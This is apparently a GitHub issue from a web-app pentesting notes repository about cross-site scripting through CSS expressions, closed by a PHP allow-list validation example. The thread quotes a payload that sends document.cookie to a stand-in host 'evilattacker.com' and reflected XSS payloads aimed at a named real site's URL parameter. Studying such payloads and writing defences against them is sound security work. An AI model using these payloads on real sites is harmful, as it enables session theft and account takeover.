tcpiplab / Web-App-Hacking-Notes

Notes I've taken while working through various web app pentesting labs.

Create notes about XSS via CSS expressions #6

Open tcpiplab opened 7 years ago

tcpiplab commented 7 years ago

From @padraic's book which is at his phpsecurity repository:

On the server:

<div style="background:<?php echo $colour ?>;">

Injection payload:

$colour = "expression(document.write('<iframe src="
    .= "http://evilattacker.com?cookie=' + document.cookie.escape() + "
    .= "' height=0 width=0 />'))";

<div style="background:<?php echo $colour ?>;">

tcpiplab commented 7 years ago

Sitepoint has a good page documenting CSS expressions.

tcpiplab commented 7 years ago

I first heard of CSS expressions as an XSS payload from a publicly disclosed bug on hackerone.com:

Reflected cross-site scripting (XSS) vulnerability in scores.ubnt.com allows attackers to inject arbitrary web script via p parameter.

Attack:

https://scores.ubnt.com/form.html?uid=259&p=airFiber);xss:expression(alert(1));border-image:url(foobar

Two options for the payload:

);xss:expression(alert(1));border-image:url(foobar
);border-image: url(javascript:alert(1));content:url(foobar

tcpiplab commented 7 years ago

This attack targets older IE browsers. But it supposedly works with Chrome, which I will test.
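
Added example, not part of this thread or of the book cited above: the server-side pattern `<div style="background:<?php echo $colour ?>;">` places user input in a CSS context, so HTML escaping alone does not neutralise the payload shapes quoted here; validating the value against an allow-list does. The function name `safe_css_colour()`, the list of named colours and the sample inputs are assumptions constructed for illustration.

```php
<?php
// Added example: allow-list validation for a value echoed into style="background:...".
// safe_css_colour() and the sample inputs are hypothetical, constructed for illustration.

function safe_css_colour(string $value, string $fallback = 'transparent'): string
{
    $value = trim($value);

    // #rgb, #rgba, #rrggbb or #rrggbbaa hex colours.
    if (preg_match('/\A#(?:[0-9a-fA-F]{3,4}|[0-9a-fA-F]{6}|[0-9a-fA-F]{8})\z/', $value)) {
        return strtolower($value);
    }

    // A small fixed set of named colours; extend as the application needs.
    $named = ['black', 'white', 'red', 'green', 'blue', 'yellow', 'grey', 'gray'];
    if (in_array(strtolower($value), $named, true)) {
        return strtolower($value);
    }

    // Anything else (parentheses, colons, semicolons, url(), expression()) is dropped.
    return $fallback;
}

// Constructed inputs: two legitimate colours and the payload shapes quoted in this thread.
$samples = [
    '#FFcc00',
    'Red',
    'expression(alert(1))',
    'airFiber);xss:expression(alert(1));border-image:url(foobar',
    'airFiber);border-image: url(javascript:alert(1));content:url(foobar',
];

foreach ($samples as $input) {
    // HTML escaping alone leaves the CSS payloads intact: they contain no <, >, & or quotes.
    $escapedOnly = htmlspecialchars($input, ENT_QUOTES, 'UTF-8');
    $validated   = htmlspecialchars(safe_css_colour($input), ENT_QUOTES, 'UTF-8');

    printf("input:        %s\n", $input);
    printf("escaped only: <div style=\"background:%s;\">\n", $escapedOnly);
    printf("validated:    <div style=\"background:%s;\">\n\n", $validated);
}
```

The "escaped only" lines come out byte-for-byte identical to the input for all three payload samples, while the "validated" lines fall back to `transparent`.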